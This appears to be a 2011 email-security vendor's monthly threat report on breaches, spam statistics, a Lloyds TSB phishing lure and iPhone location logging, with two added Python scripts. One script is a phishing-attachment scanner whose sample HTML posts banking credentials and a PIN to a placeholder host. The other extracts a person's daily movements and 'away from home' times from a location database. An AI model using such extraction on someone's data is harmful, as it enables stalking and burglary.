
May 2011

Threat and Spamscape Report


What we saw in April

April was full of domestic breaches, claims of international espionage, phishing attacks and malware that kept us constantly busy. On top of that, Sony's PlayStation Network is under attack from unknown foes, and Facebook users continue to be a prime target for attackers. Here are a few of the highlights:

  • April did not start slowly in the realm of security incidents. Epsilon, a large Texas-based company that specializes in marketing email, disclosed in early April that it had suffered a breach and that a large but unspecified number of email addresses had been accessed. Many major corporate customers could be affected, including Chase Bank, whose customers appear to have already been targeted as a result of this breach.
  • Ashampoo, a German software company, suffered the same fate a few weeks later. The company reported that several of its servers, containing customer names and contact information, had been hacked. Luckily, no personal or financial information was exposed.
  • Hundreds of different phishing variations occur daily, and we see millions of phishing emails each month. We'll look at one in particular that targeted customers of Lloyds TSB.
  • Stuxnet made big news last year as a worm with a very specific purpose. It was highly complex and clearly had a well-resourced team behind its creation. Its goal was sabotage of an Iranian uranium enrichment facility, and it succeeded. Now Iran has announced that it has thwarted another attack targeting the country, which it has dubbed "Stars". So far, however, there is no proof that this actually happened; security professionals are waiting for clues.
  • iPhone and iPad users are asking Apple why a persistent record of their location is being stored unencrypted on their devices and in their local backups.

Total Email Traffic Volume

This chart represents both total and spam traffic throughout the month of April. Spam traffic remained level throughout the month.

Tests Failed

This chart represents the number of times messages failed various tests over the past month. Keep in mind that many messages fail multiple tests, so the totals here exceed the number of individual spam messages seen during April.

Regions of Origin

This graph represents both spam and malicious email traffic by region. A significant surge in the amount of spam emanating from Asia caused it to outpace Europe for the first time in spam production.

Top Ten Countries of Origin

This chart represents the top countries from which spam originated during April. For the first time in months, both Russia and India surpassed spam output from the United States. We again saw record breaking numbers from Indonesia. Since February, spam levels from Indonesia have increased over 300 percent.

Here's a peek at the curious surge in spam from Indonesia:

Top Email-Delivered Viral Threats

These are the top 20 malware threats we saw last month in order of frequency, with the most frequent in the top position. Virus names that begin with "X." signify rules written by AppRiver analysts. (This doesn't mean that other anti-virus vendors never had definitions in place for these viruses; it simply means that AppRiver often had protection in place before many of them did.)

  • X.W32.Kryptik.CTR.pak
  • X.W32.PX.pakb
  • X.W32.PX.pakc
  • X.W32.Sasfis.pak
  • X.W32\facePakb
  • X.W32.Bredolab.apr1
  • X.W32.Bredolab.apr4c
  • W32\TrojanDownloader.Zurg
  • W32\Bredolab.ARL
  • X.W32.Bredo.418
  • W32\TrojanDownloader.Prod
  • X.W32.Buzus.pak
  • X.html.fdphish7
  • W32\Mydoom.O
  • X.W32.Netsky.Q
  • W32\Mydoom.R_worm
  • W32\Merond.O_worm
  • X.W32.Bredo.pic
  • X.win32.worm.20080529
  • W32\Mydoom.N

30 Day Virus Activity

This chart represents email-borne virus and malware activity during April as seen by AppRiver filters. Messages containing a virus have been rising steadily since January, and this month was no exception: for the third straight month, their volume more than doubled. By the end of April we had quarantined more than 43 million of these messages.

Here is a look at the upward trend of the past six months:

Image Spam

The chart below represents total Image spam seen by AppRiver filters during April. Image spam increased slightly this month.

Has Iran Been Targeted Again?

Brigadier General Gholam Reza Jalali, head of Iran's Passive Defense Organization, told Iran's Mehr News Agency on Monday, April 25th, that they had intercepted and thwarted another direct attack against Iran's infrastructure. He likened it to the attack that succeeded last year, the Stuxnet worm. That attack was highly sophisticated and had been active for a considerable time before anyone detected it. It combined social engineering (infected removable media carried in by people) with exploits against Windows and the Siemens industrial control software in use, which is how it reached a network with no Internet connection and disrupted the uranium enrichment process at an Iranian facility. This new attack, which he has dubbed "Stars", has security professionals questioning the news. No details or proof have been offered: there has been no mention of the malware's targets or its possible intent, simply a claim that it happened. In the Stuxnet case, security companies had samples to analyze and share, and could see first-hand the complexity of that worm. It is entirely possible that the Iranian government is still feeling the sting of Stuxnet and is being a bit jumpy. It is also possible that this was not a directed attack at all, but a broadly cast malware campaign that happened to land there and was initially mistaken for a targeted one. Without a sample, or even an MD5 hash to compare against, we will unfortunately have to wait and see.

The Epsilon Breach

The first few days of April brought news that Epsilon, a company specializing in email-based marketing, had suffered a major data breach. The company sends marketing emails on behalf of many large corporations, including Capital One, Citigroup, US Bank and many more. Attackers gained access to an unspecified number of valid email addresses and, presumably, the client list each address belongs to. Epsilon reportedly does not store customers' personal or account information, so the breach should be limited to names, email addresses and the corresponding company affiliation. For example, a Capital One customer may have had their email address stolen; along with the address, the attacker now knows that it belongs to a customer of that particular bank.

This information is very useful for spamming, phishing and malware campaigns. Normally attackers send mass emails to as many people as possible on the assumption that a small percentage of them bank with the institution named in the lure. With the stolen data, this group can aim a mass phishing campaign solely at the customers of a specific company. Beyond better-aimed mass campaigns, they can narrow their focus further with carefully crafted spear-phishing messages to users on the newly acquired list. Any way you look at it, this breach gives the cybercrooks a lot of ammunition for their attacks.

It has since been reported, according to the Better Business Bureau, that Chase Bank customers have already been targeted using information stolen in the Epsilon breach. The emails sent to Chase customers claim that their accounts will be frozen unless they reply with sensitive account information. Here is a sample of what the emails looked like.

Remain alert when you receive emails that claim to come from financial institutions. If they contain requests for information, think twice about what you are looking at, and if there is any question at all, contact the institution directly using a phone number or address you already have rather than one supplied in the message. Do not act on demands for information, or notifications of account breaches or freezes, that arrive via email. After this breach it is especially important to stay attentive if you do business with any of the following companies, whose customer emails were compromised at Epsilon:

US Bank, Citibank, Barclays, JP Morgan Chase, Kroger, Best Buy, Walgreens, Target, HSN, Marriott, Hilton, Disney Destinations, and Red Roof Inn.

Ashampoo Suffers a Breach Too

German software company Ashampoo, maker of products ranging from antivirus to photo editors and CAD programs, was also hit by attackers later in April. Much like the Epsilon breach, the compromise of several of Ashampoo's servers exposed customer names and email addresses, but not financial data, which was held separately. There are claims that this information has already been used to send malicious PDF attachments, disguised as order confirmation receipts, to past Ashampoo customers. Ashampoo issued this warning to its customers:

"Dear Ashampoo customer,
We are writing to you concerning an important issue. We regret to tell you that we also detected an unauthorized access to one of our server systems. We assume that the attackers were able to purloin data of customers. Sensitive data such as billing information etc. is not affected by this, because Ashampoo does not store this data. We summarized all pieces of information concerning this incident for you and would like you to read the following website: http://www.ashampoo.com/datatheft"

Lloyds TSB Customers Targeted

We see millions of phishing attacks each month. Many show little effort; others are more sophisticated. Some try new techniques, while others are simple and straightforward. This month we want to point out a common ploy that clients are likely to see in the wild. It isn't a particularly impressive attack, though its use of graphics and minor obfuscation could trap some unwary victims.

During the third week of April we saw this campaign coming in, targeting Lloyds TSB customers. The messages carried HTML attachments. Their subject lines are what caught our eye: instead of the run-of-the-mill "your account has been suspended" approach, the attackers tried to entice victims by making them believe they might be coming into money.

Once the attachment is opened the viewer is given this page:

HTML attachments have become popular in phishing because they give the illusion that the victim has browsed to a website when they are actually viewing the page locally, which the address bar makes obvious (it shows a local file path, not the bank's domain). Sending the page as an attachment also means there is no link in the message body for URL-reputation filters to inspect. This graphics-rich HTML page appears to belong to the Lloyds TSB website, but its form posts whatever the victim types to another site, a compromised third-party server that hosts the remaining phishing pages and collects the stolen information.



The first page tried to collect the user's ID and password. Ordinarily these phishing sites have some check in place to make sure you've entered what at least looks like valid information. This one does not; simply clicking "Continue" without entering anything at all took us to the next page.



Here it goes on to extract even more information, details a real bank would never ask you for. After clicking "Continue" on this page, the victim is sent to the real Lloyds TSB log-in page, where they will learn something they may wish they had known before filling out either of those pages:



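The attachment-based lure walked through above, as an added example that is not part of the original report: a Python script that pulls the forms, input fields and asset hosts out of an HTML attachment and scores the traits the walkthrough points out (a credential form that posts to a host the bank does not own, requests for card, PIN or account data that a sign-in page never needs, and the real bank's images hotlinked to dress up the page). The two HTML documents and the host phish-kit.example are constructed stand-ins, not the campaign's actual files.

```python
"""Triage an HTML e-mail attachment for the phishing traits described above.

Added example, not code from the original report: the two HTML documents
below are constructed stand-ins for the Lloyds TSB lure, and the host
phish-kit.example is a placeholder, not the compromised site the report saw.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Field names a bank login page would never ask for (beyond the password itself).
SENSITIVE_RE = re.compile(r"(pass|pin|card|cvv|cvc|sort|account|memorable|dob|ssn)", re.I)

# Constructed page 1: the attachment itself, rendered from the local disk.
ATTACHMENT = """<html><head><title>Lloyds TSB - Internet Banking</title></head>
<body><img src="http://www.lloydstsb.com/images/logo.gif">
<form method="post" action="http://phish-kit.example/lloyds/verify.php">
User ID <input type="text" name="userid">
Password <input type="password" name="password">
<input type="submit" value="Continue"></form></body></html>"""

# Constructed page 2: served by the compromised host after the first POST.
SECOND_PAGE = """<html><body><img src="http://www.lloydstsb.com/images/logo.gif">
<form method="post" action="/lloyds/confirm.php">
Sort code <input type="text" name="sortcode">
Account number <input type="text" name="accountno">
Card number <input type="text" name="cardnumber">
PIN <input type="password" name="pin">
<input type="submit" value="Continue"></form></body></html>"""


class _Scanner(HTMLParser):
    """Collect forms, their inputs, meta refreshes, and the hosts assets load from."""

    def __init__(self):
        super().__init__()
        self.forms, self.asset_hosts, self.refresh_to, self._form = [], set(), [], None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # HTMLParser lower-cases tag and attribute names for us
        if tag == "form":
            self._form = {"action": a.get("action") or "",
                          "method": (a.get("method") or "get").lower(), "fields": []}
            self.forms.append(self._form)
        elif tag == "input" and self._form is not None:
            self._form["fields"].append(((a.get("type") or "text").lower(), a.get("name") or ""))
        elif tag in ("img", "script", "link"):
            host = urlparse(a.get("src") or a.get("href") or "").hostname
            if host:
                self.asset_hosts.add(host.lower())
        elif tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            m = re.search(r"url\s*=\s*(\S+)", a.get("content") or "", re.I)
            if m:
                self.refresh_to.append(m.group(1))

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None


def _is_brand(host, brand_domains):
    return any(host == d or host.endswith("." + d) for d in brand_domains)


def triage(html, brand_domains, page_origin=None):
    """Score one HTML document. page_origin is the host that served it, or None
    for an attachment opened from disk: a file:// page has no origin, so the
    only thing that says where credentials go is each form's action."""
    s = _Scanner()
    s.feed(html)
    s.close()
    post_targets, sensitive = [], []
    for f in s.forms:
        host = (urlparse(f["action"]).hostname or page_origin or "").lower()
        post_targets.append(host)
        sensitive += [n for t, n in f["fields"] if t == "password" or SENSITIVE_RE.search(n)]
    off_brand = [h for h in post_targets if not _is_brand(h, brand_domains)]
    hotlinked = sorted(h for h in s.asset_hosts if _is_brand(h, brand_domains))
    score = 0
    if sensitive and off_brand:
        score += 3  # credentials leave for a host the brand does not own
    if any(SENSITIVE_RE.search(n) and "pass" not in n.lower() for n in sensitive):
        score += 2  # card/PIN/account data that a real sign-in page never requests
    if hotlinked and off_brand:
        score += 1  # the real bank's images dress up an off-brand form
    if any(_is_brand((urlparse(u).hostname or "").lower(), brand_domains) for u in s.refresh_to):
        score += 1  # decoy hands off to the real site to hide the theft
    return {"post_targets": post_targets, "off_brand_post": bool(off_brand),
            "sensitive_fields": sensitive, "hotlinked_brand_assets": hotlinked,
            "score": score, "verdict": "phishing" if score >= 3 else "unclear"}


if __name__ == "__main__":
    brand = {"lloydstsb.com"}
    print("attachment  ", triage(ATTACHMENT, brand))
    print("second page ", triage(SECOND_PAGE, brand, page_origin="phish-kit.example"))
```

To run it on a real attachment, read the file and pass its contents to triage with the brand's domains. The same scanner works on the second-stage page if you fetch it in a sandbox and pass the serving host as page_origin, since a relative form action resolves against that host rather than against a local path.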
iPhone and iPad Users Share Information

Researchers Pete Warden and Alasdair Allan recently discovered that the iPhone and iPad maintain a database of the user's location. It is kept on the device itself and is also copied to the computer the device syncs with. The database contains detailed latitude and longitude coordinates with a timestamp for each entry. The worst part is that it is stored unencrypted, both on the device and in the iTunes backup. This raises concern not only for the "big brother is watching" aspect, but also because anyone with the ability could write custom malware to extract this information and obtain a running timeline of your day's movements and locations. That is a personal-safety issue, and it also hands would-be thieves the time of day when you will be away from home and for how long. It is even possible that this information could be gathered and sold in batches, much like credit card numbers are on underground forums today, though given the complexity of the cybercrime game and its participants' desire to avoid any physical connection to their crimes other than through their computers, this vector may be less likely. Class action lawsuits are already taking shape. One, filed by two men in Florida, claims that "users of Apple products have ... no way to prevent Apple from collecting this information because even if users disable the iPhone and iPad GPS components, Apple's tracking system remains fully functional."

I believe it would be in Apple's best interest to stop collecting this information or to at least begin encrypting it as soon as possible to avoid giving up any low hanging fruit.

The researchers have created a program for extracting this data and visualizing it on a map. It will also run through the timeline so viewers can see their paths as they were traveled. Here is a composite view of my recent trip to Chicago for ThotCon 0x2 to give you an idea.
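As an added example (not the researchers' tool, Apple's code or anything from the original report), the following Python script shows what an attacker or a forensic examiner can do with an unencrypted copy of that database. It builds a constructed consolidated.db-style SQLite file in memory, reads the fixes back, and turns them into a timeline of stays and away-from-home windows, exactly the "when and for how long" the paragraph above warns about. The table name CellLocation, its columns, and the reading of Timestamp as seconds since 2001-01-01 UTC follow the published description of consolidated.db but are treated here as assumptions; every coordinate and time is made up.

```python
"""Timeline extraction from a consolidated.db-style location database.

Added example; not the researchers' tool or Apple's code. The SQLite file is
constructed in memory. Table/column names and the epoch used for Timestamp
(seconds since 2001-01-01 UTC) are assumptions drawn from the published
description of consolidated.db; all coordinates and times are made up.
"""
import math
import sqlite3
from datetime import datetime, timedelta, timezone

MAC_EPOCH = datetime(2001, 1, 1, tzinfo=timezone.utc)  # assumed Timestamp epoch


def to_mac_time(dt):
    return (dt - MAC_EPOCH).total_seconds()


def from_mac_time(ts):
    return MAC_EPOCH + timedelta(seconds=ts)


def haversine_m(lat1, lon1, lat2, lon2):
    """Great-circle distance in metres between two lat/lon points."""
    p1, p2 = math.radians(lat1), math.radians(lat2)
    a = (math.sin((p2 - p1) / 2) ** 2
         + math.cos(p1) * math.cos(p2) * math.sin(math.radians(lon2 - lon1) / 2) ** 2)
    return 2 * 6371000.0 * math.asin(math.sqrt(a))


def build_sample_db():
    """Constructed stand-in for consolidated.db holding one day of cell fixes."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE CellLocation (MCC INTEGER, MNC INTEGER, LAC INTEGER, CI INTEGER,"
                 " Timestamp FLOAT, Latitude FLOAT, Longitude FLOAT, HorizontalAccuracy FLOAT)")
    home, office = (41.8800, -87.6300), (41.8900, -87.6200)  # made-up points about 1.4 km apart
    day = datetime(2011, 4, 20, tzinfo=timezone.utc)
    fixes = [(day + timedelta(hours=h), *home) for h in range(0, 8)]                  # home until 07:00
    fixes += [(day + timedelta(hours=h, minutes=30), *office) for h in range(8, 18)]  # office 08:30-17:30
    fixes += [(day + timedelta(hours=h), *home) for h in range(18, 24)]               # home from 18:00
    conn.executemany("INSERT INTO CellLocation VALUES (310, 410, 1, 1, ?, ?, ?, 500.0)",
                     [(to_mac_time(t), lat, lon) for t, lat, lon in fixes])
    conn.commit()
    return conn


def load_fixes(conn):
    """Read every fix oldest-first as (UTC datetime, lat, lon)."""
    rows = conn.execute("SELECT Timestamp, Latitude, Longitude FROM CellLocation ORDER BY Timestamp")
    return [(from_mac_time(ts), lat, lon) for ts, lat, lon in rows]


def summarize_stays(fixes, radius_m=500.0):
    """Collapse consecutive fixes within radius_m of a stay's first fix into
    (first_seen, last_seen, lat, lon) tuples."""
    stays = []
    for t, lat, lon in fixes:
        if stays and haversine_m(stays[-1][2], stays[-1][3], lat, lon) <= radius_m:
            stays[-1][1] = t
        else:
            stays.append([t, t, lat, lon])
    return [tuple(s) for s in stays]


def away_windows(stays, radius_m=500.0):
    """Treat the first stay's location as home and return (left, returned) pairs
    for each period with no fix near it: the 'away from home' windows the
    report warns a burglar could read off the device."""
    home_lat, home_lon = stays[0][2], stays[0][3]
    windows, left_at, been_away = [], None, False
    for first, last, lat, lon in stays:
        if haversine_m(home_lat, home_lon, lat, lon) <= radius_m:
            if been_away and left_at is not None:
                windows.append((left_at, first))
            left_at, been_away = last, False
        else:
            been_away = True
    return windows


if __name__ == "__main__":
    stays = summarize_stays(load_fixes(build_sample_db()))
    for first, last, lat, lon in stays:
        print(f"{first:%H:%M}-{last:%H:%M} UTC at {lat:.4f},{lon:.4f}")
    for left, back in away_windows(stays):
        hours = (back - left).total_seconds() / 3600
        print(f"away from home {left:%H:%M}-{back:%H:%M} UTC ({hours:.1f} h)")
```

Point load_fixes at a real file by replacing the in-memory connection with sqlite3.connect(path). Note that enabling encrypted backups in iTunes protects only the copy on the computer; the copy on the device itself is unchanged.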



This report is also available as a PDF download: May 2011 Threat & Spamscape Report (PDF).